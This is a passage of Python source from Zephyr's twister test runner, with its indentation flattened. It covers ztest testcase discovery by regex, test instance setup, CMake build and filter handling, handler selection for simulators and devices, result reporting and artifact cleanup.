has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
for sub in subcases:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not subcases:
self.cases.append(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.suite.enable_size_report and not self.suite.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
